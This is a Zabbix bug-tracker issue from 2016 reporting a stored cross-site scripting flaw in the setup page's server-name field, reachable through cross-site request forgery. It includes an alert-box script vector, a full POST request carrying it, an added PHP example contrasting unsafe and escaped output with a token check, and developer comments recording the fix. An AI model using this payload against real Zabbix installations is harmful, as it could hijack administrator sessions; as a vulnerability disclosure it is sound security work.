[ZBX-11371] XSS in Server name
Created: 2016 Oct 18  Updated: 2017 May 30  Resolved: 2016 Dec 08

Status: Closed
Project: ZABBIX BUGS AND ISSUES
Component/s: Frontend (F)
Affects Version/s: 3.2.0
Fix Version/s: 3.4.0alpha1

Type: Incident report Priority: Trivial
Reporter: Andrey Plastunov Assignee: Unassigned
Resolution: Fixed Votes: 0
Labels: vulnerability, xss
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified
Environment: LAMP


Attachments: PNG File Screenshot from 2016-10-18 17-25-46.png    

 Description   

There is a Stored XSS vulnerability in the Server name parameter.

This parameter is specified during the initial setup, but since /zabbix/setup.php is still available after the setup and there is no protection against CSRF attacks, a malicious attacker could convince an Admin to execute the script via a CSRF attack.

Vulnerable parameter is zbx_server_name
Example vector: </title><script>alert(document.cookie)</script>

Example request for setting up the Server name will be:
POST /zabbix/setup.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/zabbix/setup.php
Cookie: PHPSESSID=o7ok9rtqm50o0hptmppoqljen4; zbx_sessionid=da206dbd3fb3f8cb5dff506c773bd4e0; tab=2
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

sid=5dff506c773bd4e0&form_refresh=1&zbx_server=localhost&zbx_server_port=10051&zbx_server_name=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&next%5B3%5D=Next+step
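
Added example, not part of the original report and not Zabbix frontend code: the rendering flaw beside a hardened form, assuming the stored server name is echoed into the page title (as the `</title>` prefix of the vector suggests), plus a session-bound token check for the setup POST. The function names, the `csrf_token` field and the page name "Dashboard" are hypothetical.

```php
<?php
// Added illustration; all names here are hypothetical, not Zabbix code.

// Vulnerable pattern: the stored server name is concatenated into <title>
// verbatim, so markup inside the name is parsed as HTML by the browser.
function render_title_unsafe(string $serverName, string $page): string {
    return '<title>' . $serverName . ': ' . $page . '</title>';
}

// Hardened pattern: encode for the HTML text context at output time,
// regardless of where the value came from (config file, DB, request).
function render_title_safe(string $serverName, string $page): string {
    $enc = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<title>' . $enc($serverName) . ': ' . $enc($page) . '</title>';
}

// State-changing setup requests must carry a token bound to the session.
// hash_equals() compares in constant time; a missing or non-string token fails.
function csrf_token_valid(array $session, array $post): bool {
    return isset($session['csrf_token'], $post['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Constructed input: the zbx_server_name value from the report, URL-decoded.
$name = urldecode(
    '%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E'
);

// Unsafe output closes <title> early and leaves a live <script> element.
echo render_title_unsafe($name, 'Dashboard'), "\n";
// Safe output keeps the whole name as inert text inside <title>.
echo render_title_safe($name, 'Dashboard'), "\n";

// Constructed session with a random per-session token.
$session = ['csrf_token' => bin2hex(random_bytes(16))];

// A cross-site form post cannot know the token, so it is rejected.
var_dump(csrf_token_valid($session, ['zbx_server_name' => $name]));
// The legitimate form echoes the session token back and is accepted.
var_dump(csrf_token_valid($session, [
    'zbx_server_name' => 'Production',
    'csrf_token'      => $session['csrf_token'],
]));
```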



 Comments   
Comment by Aleksandrs Saveljevs [ 2016 Oct 24 ]

$ZBX_SERVER_NAME is meant to be a regular PHP variable in the read-only conf/zabbix.conf.php. So changing $ZBX_SERVER_NAME is essentially equivalent to changing PHP code for the entire Zabbix system. If one has access to Zabbix code, then one can do anything.

Regarding setup.php, it is only accessible to super admins after Zabbix is installed. Is there any way a non-admin can exploit it?

Comment by vitalijs.cemeris (Inactive) [ 2016 Nov 28 ]

(1) No translation string changes.

gunarspujats CLOSED

Comment by vitalijs.cemeris (Inactive) [ 2016 Nov 28 ]

Fixed in the development branch svn://svn.zabbix.com/branches/dev/ZBX-11371

Comment by Natalja Romancaka [ 2016 Nov 28 ]

UI tested

Comment by Gunars Pujats (Inactive) [ 2016 Dec 07 ]

Tested

Comment by vitalijs.cemeris (Inactive) [ 2016 Dec 07 ]

Fixed in pre-3.3.0 r64250
